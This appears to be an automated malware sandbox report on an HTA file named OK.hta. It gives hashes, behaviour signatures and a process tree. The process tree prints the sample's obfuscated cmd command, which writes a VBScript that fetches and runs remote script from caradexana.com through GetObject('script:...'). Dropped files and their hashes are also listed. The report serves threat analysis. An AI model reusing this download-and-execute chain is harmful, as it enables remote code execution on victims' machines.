Analysis

  • max time kernel
    363s
  • max time network
    369s
  • platform
    windows7_x64
  • resource
    win7-20230712-es
  • resource tags

    arch:x64arch:x86image:win7-20230712-eslocale:es-esos:windows7-x64systemwindows
  • submitted
    29-08-2023 18:00

General

  • Target

    OK.hta

  • Size

    28KB

  • MD5

    352e0ed1b070afa3548c6ca407e9e692

  • SHA1

    488d26262c5b975da64f090e7160b23ae3404ea6

  • SHA256

    76bf3c2ff119a63aafd9c6ebc5fe3710f93ddd86a41b84db89dfc92699a251e8

  • SHA512

    40bf5304daf66d42e4f92a4db9dfd5648d60ca5186c3c869b3d6204d768a47f640f4759cd36bc24381fe1eebae58aa8c195d9abf95f7f7153229a82339a4b360

  • SSDEEP

    768:CKNIAZw4qy4m2ZqlmAb6wUH13ghGiqNn6h:CKNIAZw/V+3i3sGiqNq

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\OK.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:932
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo|set /p=^"xsui=".":rNXHT="i":HuQq="g":XPeImd=":":GetO^">C:\\Users\\Public\\tlIMPQ.vbs&echo|set /p=^"bject("sCr"+rNXHT+"pt"+XPeImd+"hT"+"Tps"+XPeImd+"//caradexana"+xsui+"com//"+HuQq+"1")^">>C:\\Users\\Public\\tlIMPQ.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tlIMPQ.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2668
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
          PID:2660
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set /p="xsui=".":rNXHT="i":HuQq="g":XPeImd=":":GetO" 1>C:\\Users\\Public\\tlIMPQ.vbs"
          3⤵
            PID:1944
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo"
            3⤵
              PID:2232
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+rNXHT+"pt"+XPeImd+"hT"+"Tps"+XPeImd+"//caradexana"+xsui+"com//"+HuQq+"1")" 1>>C:\\Users\\Public\\tlIMPQ.vbs"
              3⤵
                PID:1900
              • \??\c:\windows\SysWOW64\cmd.exe
                c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tlIMPQ.vbs
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2148
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Public\tlIMPQ.vbs"
                  4⤵
                  • Blocklisted process makes network request
                  • Modifies system certificate store
                  PID:708

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

            Filesize

            61KB

            MD5

            f3441b8572aae8801c04f3060b550443

            SHA1

            4ef0a35436125d6821831ef36c28ffaf196cda15

            SHA256

            6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

            SHA512

            5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

          • C:\Users\Admin\AppData\Local\Temp\CabEB7A.tmp

            Filesize

            62KB

            MD5

            3ac860860707baaf32469fa7cc7c0192

            SHA1

            c33c2acdaba0e6fa41fd2f00f186804722477639

            SHA256

            d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

            SHA512

            d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

          • C:\Users\Admin\AppData\Local\Temp\TarEC7A.tmp

            Filesize

            163KB

            MD5

            9441737383d21192400eca82fda910ec

            SHA1

            725e0d606a4fc9ba44aa8ffde65bed15e65367e4

            SHA256

            bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

            SHA512

            7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

          • C:\Users\Public\tlIMPQ.vbs

            Filesize

            43B

            MD5

            eafa0c2549bba921d83464aa07318c16

            SHA1

            772c3049b0ee17e300261f60e6867bf0c3ca3c18

            SHA256

            e8e19ff3929da4e72eecaedc7e4c04e1005f147a6b2d889b8ece5af69f9e14bb

            SHA512

            d1f7f7e0deb3b44e5cbea4be4c822948490190f3135b3ea7a0eda75aa8f22f9bb9d04d9d1121715ef103c9014d56a04bfd83c4d9f14189079bbad1a95276c938

          • C:\Users\Public\tlIMPQ.vbs

            Filesize

            128B

            MD5

            0bafd37d9f6d05f721776bfc398ec71c

            SHA1

            262a16b7e3fecf1e62c2e0a90230b99609ee48d8

            SHA256

            5483cd0151d1a0fd369d7af3df051a9e0bb753520cb474d3b1b78e306df33fd2

            SHA512

            4db6b24deea197c001ffffe9c4ef13a23b4affd7e7c49512debe4cd51fd951db3e34146dfb30ee9f2506ca29f61d3f55c87c97bae8585828912598b89a798910